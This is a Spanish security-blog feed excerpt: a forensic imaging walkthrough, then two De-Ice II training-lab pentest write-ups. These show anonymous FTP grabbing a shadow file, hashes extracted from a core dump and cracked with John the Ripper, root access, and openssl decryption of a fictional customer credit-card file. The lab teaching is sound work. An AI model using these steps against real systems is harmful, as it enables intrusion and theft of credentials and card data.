<p style="text-align: justify;"><strong>FTK Imager (Versión Portable)<br />
</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img641.imageshack.us/img641/2452/90697678.jpg" alt="" width="717" height="522" /></p>
<p style="text-align: justify;"><strong>Instrucción para el volcado de memoria</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img189.imageshack.us/img189/4991/76421242.jpg" alt="" width="709" height="530" /></p>
<p style="text-align: justify;"><strong>Información de los datos a exportar</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img684.imageshack.us/img684/6505/74514649.jpg" alt="" width="657" height="441" /></p>
<p style="text-align: justify;"><strong>Proceso de volcado de memoria en ejecución</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img535.imageshack.us/img535/2196/69618277.jpg" alt="" width="620" height="429" /></p>
<p style="text-align: justify;"><strong>Extracción finalizada</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img696.imageshack.us/img696/9036/68836204.jpg" alt="" width="614" height="413" /></p>
<p style="text-align: justify;">
<p style="text-align: justify;">Una vez recolectado el volcado de memoria procedemos a generar las firmas digitales de este archivo (El proceso de generación de firmas se realizó desde otro equipo, una vez se realizaron todas las copias.</p>
<p style="text-align: justify;"><strong><a href="http://www.adrive.com/public/94e489206ecb01fab7daa6b966d836e7ee501853c7ed031d3eda637385d938c0.html" target="_blank">Comprimido con 7zip</a>:</strong></p>
<p style="text-align: justify;"><strong>Nombre:</strong> memdump.7z<br />
<strong>CRC-32: </strong>e75fc430<br />
<strong>MD4: </strong>0e94aaef831bdd5759e02367c9721d6d<br />
<strong>MD5:</strong> f5eba1d486d14fd2251056d6621b651e<br />
<strong>SHA-1:</strong> 292009c29d81787e756fa08e4c4ecef129b69d40</p>
<p style="text-align: justify;"><strong>Descomprimido:</strong></p>
<p style="text-align: justify;"><strong>Nombre:</strong> memdump.txt<br />
<strong>CRC-32:</strong> f4700625<br />
<strong>MD4: </strong>c8b6b8a606c4f838e62962da3a9c6fa7<br />
<strong>MD5:</strong> 0f3c8134fa401585cc7b74373013b9be<br />
<strong>SHA-1: </strong>2d15c79cfdac52bf96e860555ed3b6f452c5acd0</p>
<p style="text-align: justify;"><a href="http://www.adrive.com/public/94e489206ecb01fab7daa6b966d836e7ee501853c7ed031d3eda637385d938c0.html" target="_blank"><strong>He subido una copia del volcado de memoria para quienes por diferentes motivos no puedan realizar el proceso anterior</strong></a>. (+/- 121Mb comprimido | +/-523Mb descomprimido)</p>
<p style="text-align: justify;">Ahora nos corresponde realizar varias copias completas del sistema (<strong>Preservación de la evidencia</strong> &#8211; procedimiento obligatorio en peritajes informáticos)&#8230; Veamos:</p>
<p style="text-align: justify;">En este caso para el disco C:\ &#8211; [NTFS]</p>
<p style="text-align: justify;"><strong>Para este primer caso (Drive Lógico)</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img199.imageshack.us/img199/4620/67190635.jpg" alt="" width="591" height="395" /><strong>Drive fuente</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img693.imageshack.us/img693/4843/10878366.jpg" alt="" width="614" height="401" /></p>
<p style="text-align: justify;"><strong>Exportar imagen de disco</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img205.imageshack.us/img205/8061/93754269.jpg" alt="" width="642" height="441" /></p>
<p style="text-align: justify;"><strong>Tipo de imagen a el cual se desea exportar (en mi caso seleccioné DD)<br />
</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img651.imageshack.us/img651/7417/71960441.jpg" alt="" width="591" height="406" /></p>
<p style="text-align: justify;"><strong>Información referente al caso</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img521.imageshack.us/img521/5996/89853083.jpg" alt="" width="596" height="384" /></p>
<p style="text-align: justify;"><strong>Creando la imagen</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img694.imageshack.us/img694/3902/56023802.jpg" alt="" width="617" height="422" /></p>
<p style="text-align: justify;"><strong>Verificación automática de la integridad de los datos copiados</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img294.imageshack.us/img294/3945/11211535.jpg" alt="" width="630" height="454" /><strong>Si quisiéramos realizar un copiado de disco físico sería de igual manera, solo modificariamos el primer paso (por seguridad yo realicé ambos copiados)</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img251.imageshack.us/img251/8671/17453153.jpg" alt="" width="579" height="418" /></p>
<p style="text-align: justify;"><strong>Firmas digitales de integridad de los datos copiados</strong></p>
<p style="text-align: justify;"><img class="aligncenter" title="Forensics" src="http://img714.imageshack.us/img714/2689/96820648.jpg" alt="" width="672" height="473" /><strong>Nombre:</strong> disco_C_logico.001</p>
<p style="text-align: justify;"><strong>CRC-32: </strong>4c98664d<br />
<strong>MD4:</strong> 9330d4583254e8a4d2a57e6a41c39adf<br />
<strong>MD5: </strong>249f5c1b47ad84862e35665b947a56d1<br />
<strong>SHA-1:</strong> 890b17397a6c28362747bc310c42d4eeb4c38bae</p>
<p style="text-align: justify;">En el próximo post mostraré como podemos recolectar información de interés y adicional sobre el sistema en ejecución.</p>
<p style="text-align: justify;">Recuerden que este post solo tiene  como finalidad generar discusión y aportes relacionados a este tema&#8230; así que bienvenidos los comentarios.</p>
<p style="text-align: justify;">Una vez recolectemos toda la información necesaria, podremos comenzar con el análisis de estos&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/reto-de-analisis-forense-digital-de-la-comunidad-dragonjar-live-response-recoleccion-de-datos-volatiles/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel II – Información Confidencial y Backdoors</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors#comments</comments>
		<pubDate>Mon, 22 Feb 2010 21:37:44 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=448</guid>
		<description><![CDATA[Ahora que tenemos acceso al sistema como usuarios privilegiados, procedemos a recolectar y extraer la información confidencial que exista en el sistema.
Nos logueamos en el sistema:
login as: bbanter
bbanter@192.168.1.110’s password:
Linux 2.6.16.
bbanter@slax:~$ su
Password: **********
root@slax:/home/bbanter#
Exploremos los diferentes directorios en busca de información confidencial
root@slax:/home/aadams# ls -la
total 4
drwxr-xr-x 2 aadams users   80 Mar 15  2007 .
drwxr-xr-x 8 root   root   140 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ahora que tenemos acceso al sistema como usuarios privilegiados, procedemos a recolectar y extraer la información confidencial que exista en el sistema.</p>
<p style="text-align: justify;"><span id="more-448"></span>Nos logueamos en el sistema:</p>
<p style="text-align: justify;"><strong>login as: bbanter</strong><br />
bbanter@192.168.1.110’s password:<br />
Linux 2.6.16.<br />
bbanter@slax:~$ su<br />
Password: **********<br />
root@slax:/home/bbanter#</p>
<p style="text-align: justify;">Exploremos los diferentes directorios en busca de información confidencial</p>
<p style="text-align: justify;"><strong>root@slax:/home/aadams# ls -la</strong><br />
total 4<br />
drwxr-xr-x 2 aadams users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 aadams users 3729 Feb  4  2007 .screenrc<br />
root@slax:/home/aadams# ls /home/bbanter/ -la<br />
total 4<br />
drwxr-xr-x 2 bbanter users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root    root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 bbanter users 3729 Feb  4  2007 .screenrc<br />
<strong>root@slax:/home/aadams# ls /home/ccoffee/ -la</strong><br />
total 4<br />
drwxr-xr-x 2 ccoffee users   80 Mar 15  2007 .<br />
drwxr-xr-x 8 root    root   140 Mar 15  2007 ..<br />
-rw-r&#8211;r&#8211; 1 ccoffee users 3729 Feb  4  2007 .screenrc<br />
<strong>root@slax:/home/aadams# ls /home/ftp/ -la</strong><br />
total 0<br />
drwxr-xr-x 4 root   root  80 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root 140 Mar 15  2007 ..<br />
drwxr-xr-x 7 aadams  513 160 Mar 15  2007 download<br />
drwxrwxrwx 2 root   root  60 Feb 26  2007 incoming<br />
<strong>root@slax:/home/aadams# ls /home/root/ -la</strong><br />
total 4<br />
drwxr-xr-x 3 aadams  513  100 Mar 15  2007 .<br />
drwxr-xr-x 8 root   root  140 Mar 15  2007 ..<br />
drwx&#8212;&#8212; 2 root   root  100 Mar 15  2007 .save<br />
-rw-r&#8211;r&#8211; 1 aadams  513 3729 Feb 27  2007 .screenrc</p>
<p style="text-align: justify;">Nos encontramos con dos archivos de interés:</p>
<p style="text-align: justify;"><strong>root@slax:/home/aadams# cd ..</strong><br />
<strong>root@slax:/home# cd root/.save/<br />
root@slax:/home/root/.save# ls -la</strong><br />
total 8<br />
drwx&#8212;&#8212; 2 root   root 100 Mar 15  2007 .<br />
drwxr-xr-x 3 aadams  513 100 Mar 15  2007 ..<br />
-r-x&#8212;&#8212; 1 root   root 198 Mar 13  2007 copy.sh<br />
-rw-r&#8211;r&#8211; 1 aadams  513 560 Mar 13  2007 customer_account.csv.enc</p>
<p style="text-align: justify;">Exploremos el contenido de estos:</p>
<p style="text-align: justify;"><strong>COPY.SH</strong></p>
<p style="text-align: justify;"><strong></strong><strong>root@slax:/home/root/.save# cat copy.sh</strong><br />
#!/bin/sh<br />
#encrypt files in ftp/incoming<br />
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw<br />
#remove old file<br />
rm /home/ftp/incoming/$1</p>
<p style="text-align: justify;">Este archivo parecía ser utilizado para cifrar los archivos contenidos en el directorio incoming del FTP con cifrado aes-256-cbc luego realiza una copia del archivo cifrado al directorio /home/root/.save haciendo uso de los certificados en /etc/ssl/certs/pw y eliminando copias anteriores.</p>
<p style="text-align: justify;">Por lo tanto por este mismo medio podemos descifrar el contenido de este archivo&#8230;</p>
<p style="text-align: justify;"><strong>root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out clientes.csv -pass file:/etc/ssl/certs/pw</strong><br />
<strong>root@slax:/home/root/.save# ls</strong><br />
clientes.csv  copy.sh  customer_account.csv.enc</p>
<p style="text-align: justify;"><strong>Visualicemos el archivo:</strong></p>
<p style="text-align: justify;"><strong>root@slax:/home/root/.save# cat clientes.csv</strong><br />
&#8220;CustomerID&#8221;,&#8221;CustomerName&#8221;,&#8221;CCType&#8221;,&#8221;AccountNo&#8221;,&#8221;ExpDate&#8221;,&#8221;DelMethod&#8221;<br />
1002,&#8221;Mozart Exercise Balls Corp.&#8221;,&#8221;VISA&#8221;,&#8221;2412225132153211&#8243;,&#8221;11/09&#8243;,&#8221;SHIP&#8221;<br />
1003,&#8221;Brahms 4-Hands Pianos&#8221;,&#8221;MC&#8221;,&#8221;3513151542522415&#8243;,&#8221;07/08&#8243;,&#8221;SHIP&#8221;<br />
1004,&#8221;Strauss Blue River Drinks&#8221;,&#8221;MC&#8221;,&#8221;2514351522413214&#8243;,&#8221;02/08&#8243;,&#8221;PICKUP&#8221;<br />
1005,&#8221;Beethoven Hearing-Aid Corp.&#8221;,&#8221;VISA&#8221;,&#8221;5126391235199246&#8243;,&#8221;09/09&#8243;,&#8221;SHIP&#8221;<br />
1006,&#8221;Mendelssohn Wedding Dresses&#8221;,&#8221;MC&#8221;,&#8221;6147032541326464&#8243;,&#8221;01/10&#8243;,&#8221;PICKUP&#8221;<br />
1007,&#8221;Tchaikovsky Nut Importer and Supplies&#8221;,&#8221;VISA&#8221;,&#8221;4123214145321524&#8243;,&#8221;05/08&#8243;,&#8221;SHIP&#8221;</p>
<p style="text-align: justify;">Hemos obtenido acceso a las tarjetas de crédito de los clientes de dicho sistema objetivo&#8230;</p>
<p style="text-align: justify;">Veamos ahora como podemos implementar un backdoor en el sistema:</p>
<h2 style="text-align: justify;"><strong><a href="http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%E2%80%93-backdoors-manteniendo-el-acceso" target="_blank">Tema ya tratado en el anterior entorno</a></strong></h2>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-informacion-confidencial-y-backdoors/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel II – Acceso al Sistema y Elevación de Privilegios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios#comments</comments>
		<pubDate>Fri, 19 Feb 2010 03:34:21 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=439</guid>
		<description><![CDATA[Una vez hemos conseguido ingresar al sistema por medio del servidor FTP con acceso anónimo trataremos de elevar u obtener información sensible que nos permita cumplir con nuestro objetivo como PenTesters.
Ingresemos entonces al sistema, exploremos y recolectemos información.
root@bt:~/De-Ice_II# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Una vez hemos conseguido ingresar al sistema por medio del servidor FTP con acceso anónimo trataremos de elevar u obtener información sensible que nos permita cumplir con nuestro objetivo como PenTesters.</p>
<p style="text-align: justify;"><span id="more-439"></span>Ingresemos entonces al sistema, exploremos y recolectemos información.</p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# ftp 192.168.1.110</strong><br />
Connected to 192.168.1.110.<br />
220 (vsFTPd 2.0.4)<br />
Name (192.168.1.110:root): anonymous<br />
331 Please specify the password.<br />
Password:<br />
230 Login successful.<br />
Remote system type is UNIX.<br />
Using binary mode to transfer files.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align: justify;"><strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download<br />
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming<br />
226 Directory send OK.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;">Exploremos lo que parece ser el directorio de descargas de copias de seguridad o migraciones descrito en el <a href="http://www.sec-track.com/de-ice-pentest-livecds-nivel-ii" target="_blank"><strong>escenario del entorno</strong></a>.</p>
<p style="text-align: justify;"><strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc<br />
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt<br />
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root<br />
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr<br />
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var<br />
226 Directory send OK.</p>
<p style="text-align: justify;">Acá debemos explorar en detalle el contenido de cada uno de estos directorios con la finalidad de encontrar información relevante que permita elevar privilegios en el sistema. Cada persona será libre de elegir el directorio por el cual comenzar, pero recomiendo hacerlo con los directorios que revelan más información del sistema. Para este caso el directorio /etc.</p>
<p style="text-align: justify;"><strong>ftp&gt; cd etc</strong><br />
250 Directory successfully changed.<br />
<strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11<br />
-rw-r&#8211;r&#8211;    1 1000     513        362436 Mar 03  2007 core<br />
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts<br />
-rw-r&#8211;r&#8211;    1 1000     513           780 Apr 30  2005 hosts<br />
-rw-r&#8211;r&#8211;    1 1000     513           718 Jul 03  2005 inputrc<br />
-rw-r&#8211;r&#8211;    1 1000     513          1296 Jun 10  2006 issue<br />
-rw-r&#8211;r&#8211;    1 1000     513           183 Jun 23  2005 lisarc<br />
-rw-r&#8211;r&#8211;    1 1000     513            56 Oct 21  2004 localtime<br />
lrwxrwxrwx    1 1000     513            23 Feb 18 06:16 localtime-copied-from -&gt; /usr/share/zoneinfo/GMT<br />
-rw-r&#8211;r&#8211;    1 1000     513         10289 Dec 31  2003 login.defs<br />
-rw-r&#8211;r&#8211;    1 1000     513             1 Dec 31  2003 motd-slax<br />
drwxr-xr-x    2 1000     513           100 Mar 15  2007 profile.d<br />
drwxr-xr-x    2 1000     513           220 Mar 15  2007 rc.d<br />
-rw-r&#8211;r&#8211;    1 1000     513           440 Jul 18  2006 shadow<br />
226 Directory send OK.</p>
<p style="text-align: justify;">Recomiendo además ir realizando la descarga de los archivos y directorios que consideremos de interés para el Test de Penetración. Para ello basta ejecutar la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>get name_file</strong></p>
<p style="text-align: justify;">En este caso quedaría así:</p>
<p style="text-align: justify;"><strong>ftp&gt; get shadow</strong><br />
local: shadow remote: shadow<br />
200 PORT command successful. Consider using PASV.<br />
150 Opening BINARY mode data connection for shadow (440 bytes).<br />
226 File send OK.<br />
440 bytes received in 0.00 secs (1761.0 kB/s)</p>
<p style="text-align: justify;">Una vez descargados y analizados los archivos procedemos a utilizar los resultados obtenidos en dicho análisis.</p>
<p style="text-align: justify;">Entre los archivos descargados y analizados podemos encontrar varios de mucho interés que deben ser tenidos en cuenta.</p>
<p style="text-align: justify;">Uno de ellos es el archivo shadow almacenado en el directorio /etc</p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# cat shadow</strong><br />
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::<br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::<br />
adm:*:9797:0:::::<br />
lp:*:9797:0:::::<br />
sync:*:9797:0:::::<br />
shutdown:*:9797:0:::::<br />
halt:*:9797:0:::::<br />
mail:*:9797:0:::::<br />
news:*:9797:0:::::<br />
uucp:*:9797:0:::::<br />
operator:*:9797:0:::::<br />
games:*:9797:0:::::<br />
ftp:*:9797:0:::::<br />
smmsp:*:9797:0:::::<br />
mysql:*:9797:0:::::<br />
rpc:*:9797:0:::::<br />
sshd:*:9797:0:::::<br />
gdm:*:9797:0:::::<br />
pop:*:9797:0:::::<br />
nobody:*:9797:0:::::</p>
<p style="text-align: justify;">Podríamos intentar un ataque de fuerza bruta para descifrar la contraseña de root, pero si observamos en detalle el mismo, podemos deducir que este no corresponde al sistema objetivo, pues no presenta los posibles usuarios administradores del sistema identificados en la primera fase del Test de Penetración.</p>
<p style="text-align: justify;">Contact information for admins is as follows:<br />
Sr. System Admin: Adam Adams &#8211; adamsa@herot.net<br />
System Admin (Intern): Bob Banter &#8211; banterb@herot.net<br />
System Admin: Chad Coffee &#8211; coffeec@herot.net</p>
<p style="text-align: justify;">De otro lado fue decisivo encontrar un archivo conocido como <a href="http://en.wikipedia.org/wiki/Core_dump" target="_blank"><strong>CORE</strong></a></p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# ls</strong><br />
<strong>core </strong> rc.FireWall  rc.S    rc.inet1  rc.slaxconfig  shadow<br />
rc.6  rc.M         rc.gpm  rc.slax   root</p>
<p style="text-align: justify;">Los archivos core son generados (volcados de memoria) a raiz de fallos o crash del sistema. Estos contienen información referente al estado de memoría y del sistema, además de contener información relacionada al aplicativo que generó dicho crash. (<a href="http://en.wikipedia.org/wiki/Core_dump" target="_blank"><strong>Más información&gt;&gt;</strong></a>)</p>
<p style="text-align: justify;">Veamos los strings de dicho archivo:</p>
<p style="text-align: justify;">&#8230; (Final del archivo core)</p>
<address style="text-align: justify;">root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::<br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::</address>
<address style="text-align: justify;">adm:*:9797:0:::::<br />
lp:*:9797:0:::::</address>
<address style="text-align: justify;">sync:*:9797:0:::::</address>
<address style="text-align: justify;">shutdown:*:9797:0:::::</address>
<address style="text-align: justify;">halt:*:9797:0:::::</address>
<address style="text-align: justify;">mail:*:9797:0:::::</address>
<address style="text-align: justify;">news:*:9797:0:::::</address>
<address style="text-align: justify;">uucp:*:9797:0:::::</address>
<address style="text-align: justify;">operator:*:9797:0:::::</address>
<address style="text-align: justify;">games:*:9797:0:::::</address>
<address style="text-align: justify;">ftp:*:9797:0:::::</address>
<address style="text-align: justify;">smmsp:*:9797:0:::::</address>
<address style="text-align: justify;">mysql:*:9797:0:::::</address>
<address style="text-align: justify;">rpc:*:9797:0:::::</address>
<address style="text-align: justify;">sshd:*:9797:0:::::</address>
<address style="text-align: justify;">gdm:*:9797:0:::::</address>
<address style="text-align: justify;">pop:*:9797:0:::::</address>
<address style="text-align: justify;">nobody:*:9797:0:::::</address>
<address style="text-align: justify;">aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::</address>
<address style="text-align: justify;">bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::</address>
<address style="text-align: justify;">ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::</address>
<p style="text-align: justify;">Una vez identificados los usuarios válidos del sistema procedamos a descifrar sus contraseñas.</p>
<p style="text-align: justify;">Hagamos uso de <a href="http://es.wikipedia.org/wiki/John_the_Ripper" target="_blank"><strong>john the ripper</strong></a></p>
<p style="text-align: justify;"><strong>root@bt:~/Sec-Track/info/john-1.7.4.2/run# ./john</strong><br />
John the Ripper password cracker, version 1.7.4.2<br />
Copyright (c) 1996-2010 by Solar Designer and others<br />
Homepage: http://www.openwall.com/john/</p>
<p>Usage: john [OPTIONS] [PASSWORD-FILES]<br />
&#8211;single                   &#8220;single crack&#8221; mode<br />
&#8211;wordlist=FILE &#8211;stdin    wordlist mode, read words from FILE or stdin<br />
&#8211;rules                    enable word mangling rules for wordlist mode<br />
&#8211;incremental[=MODE]       &#8220;incremental&#8221; mode [using section MODE]<br />
&#8211;external=MODE            external mode or word filter<br />
&#8211;stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]<br />
&#8211;restore[=NAME]           restore an interrupted session [called NAME]<br />
&#8211;session=NAME             give a new session the NAME<br />
&#8211;status[=NAME]            print status of a session [called NAME]<br />
&#8211;make-charset=FILE        make a charset, FILE will be overwritten<br />
&#8211;show                     show cracked passwords<br />
&#8211;test[=TIME]              run tests and benchmarks for TIME seconds each<br />
&#8211;users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only<br />
&#8211;groups=[-]GID[,..]       load users [not] of this (these) group(s) only<br />
&#8211;shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only<br />
&#8211;salts=[-]COUNT           load salts with[out] at least COUNT passwords only<br />
&#8211;format=NAME              force hash type NAME: DES/BSDI/MD5/BF/AFS/LM<br />
&#8211;save-memory=LEVEL        enable memory saving, at LEVEL 1..3</p>
<p style="text-align: justify;">Comenzaré utilizando el diccionario básico que incluye el mismo john the ripper, según los resultados obtenidos aumentaré la complejidad de los diccionarios.</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;">Con diccionarios básicos no he tenido buenos resultados&#8230; Por ello utilicé un diccionario más complejo que me va arrojando los siguientes resultados:</p>
<p style="text-align: justify;"><strong>C:\Users\4v4t4r\Downloads\john171w\john1701\run&gt;john-386.exe users.txt &#8211;wordlist=dic.lst<br />
</strong><br />
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:00:33 1%  c/s: 5559  trying: Jagdgesetze<br />
guesses: 0  time: 0:00:00:54 1%  c/s: 5561  trying: Unberechenbarke<br />
guesses: 0  time: 0:00:01:36 3%  c/s: 5508  trying: pingelige<br />
guesses: 0  time: 0:00:02:38 5%  c/s: 5528  trying: de&#8217;mante`lerai<br />
guesses: 0  time: 0:00:03:27 6%  c/s: 5534  trying: radioreportages<br />
guesses: 0  time: 0:00:06:14 10%  c/s: 5528  trying: seccature<br />
guesses: 0  time: 0:00:07:06 12%  c/s: 5527  trying: ik{iseni<br />
guesses: 0  time: 0:00:13:50 25%  c/s: 5502  trying: cvakaly<br />
guesses: 0  time: 0:00:14:21 26%  c/s: 5503  trying: nejnevycvicenej<br />
guesses: 0  time: 0:00:19:14 33%  c/s: 5483  trying: myjv<br />
guesses: 0  time: 0:00:21:18 36%  c/s: 5483  trying: villaje<br />
<strong>Complexity       (root)</strong><br />
guesses: 1  time: 0:00:21:39 37%  c/s: 5483  trying: Beintema<br />
guesses: 1  time: 0:00:24:09 42%  c/s: 5474  trying: walesa</p>
<p style="text-align: justify;">Encontrado el password de root (Y) de todas maneras la dejo seguir, con el objetivo de descifrar los demás passwords.</p>
<p style="text-align: justify;"><strong>Finalmente y luego de 40 minutos obtuvimos lo siguiente:</strong></p>
<p style="text-align: justify;">C:\Users\4v4t4r\Downloads\john171w\john1701\run&gt;john-386.exe users.txt &#8211;wordlis<br />
t=dic.lst<br />
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:00:33 1%  c/s: 5559  trying: Jagdgesetze<br />
guesses: 0  time: 0:00:00:54 1%  c/s: 5561  trying: Unberechenbarke<br />
guesses: 0  time: 0:00:01:36 3%  c/s: 5508  trying: pingelige<br />
guesses: 0  time: 0:00:02:38 5%  c/s: 5528  trying: de&#8217;mante`lerai<br />
guesses: 0  time: 0:00:03:27 6%  c/s: 5534  trying: radioreportages<br />
guesses: 0  time: 0:00:06:14 10%  c/s: 5528  trying: seccature<br />
guesses: 0  time: 0:00:07:06 12%  c/s: 5527  trying: ik{iseni<br />
guesses: 0  time: 0:00:13:50 25%  c/s: 5502  trying: cvakaly<br />
guesses: 0  time: 0:00:14:21 26%  c/s: 5503  trying: nejnevycvicenej<br />
guesses: 0  time: 0:00:19:14 33%  c/s: 5483  trying: myjv<br />
guesses: 0  time: 0:00:21:18 36%  c/s: 5483  trying: villaje<br />
<strong>Complexity       (root)</strong><br />
guesses: 1  time: 0:00:21:39 37%  c/s: 5483  trying: Beintema<br />
guesses: 1  time: 0:00:24:09 42%  c/s: 5474  trying: walesa<br />
<strong>Zymurgy          (bbanter)</strong><br />
guesses: 2  time: 0:00:35:35 76%  c/s: 5446  trying: Nachkriegspolit<br />
guesses: 2  time: 0:00:38:15 85%  c/s: 5444  trying: ritornato<br />
guesses: 2  time: 0:00:39:13 88%  c/s: 5442  trying: skrigen<br />
guesses: 2  time: 0:00:41:43 97%  c/s: 5448  trying: vozidlech<br />
guesses: 2  time: 0:00:42:30 100%  c/s: 5449  trying: ovrigt</p>
<p style="text-align: justify;">Confirmemos entonces el acceso al sistema con los usuarios encontrados:</p>
<p style="text-align: justify;"><strong>login as: root</strong><br />
root@192.168.1.110&#8217;s password:<br />
Access denied<br />
root@192.168.1.110&#8217;s password:</p>
<p style="text-align: justify;">Acceso denegado para login remoto como root en el sistema&#8230; Probemos entonces a iniciar con bbanter y elevar privilegios como root (su):</p>
<p style="text-align: justify;"><strong>login as: bbanter</strong><br />
bbanter@192.168.1.110&#8217;s password:<br />
Linux 2.6.16.<br />
bbanter@slax:~$ su<br />
Password: **********<br />
root@slax:/home/bbanter#</p>
<p style="text-align: justify;">Hemos conseguido ingresar al sistema con todos los privilegios&#8230; En el próximo post exploraremos el sistema en busca de información confidencial que comprometa la seguridad de la empresa objetivo&#8230;</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;">
<address style="text-align: justify;"> </address>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool: theHarvester, recolección de correos electrónicos y nombres de usuarios</title>
		<link>http://www.sec-track.com/tool-theharvester-recoleccion-de-correos-electronicos-y-nombres-de-usuarios</link>
		<comments>http://www.sec-track.com/tool-theharvester-recoleccion-de-correos-electronicos-y-nombres-de-usuarios#comments</comments>
		<pubDate>Wed, 17 Feb 2010 05:02:01 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Information Gathering]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=434</guid>
		<description><![CDATA[theHarvester (Desarrollada por Edge-Security) es una herramienta que permite recolectar direcciones electrónicas (e-mails) y nombres de usuarios desde fuentes públicas.
Estas son:
Google (e-mails), Bing search (e-mails), PgP servers (e-mails) y Linkedin (user names)
El objetivo de este proceso será el de recolectar información  (correos electrónicos / nombres de usuarios) referente a un determinado objetivo (dominio) en tareas [...]]]></description>
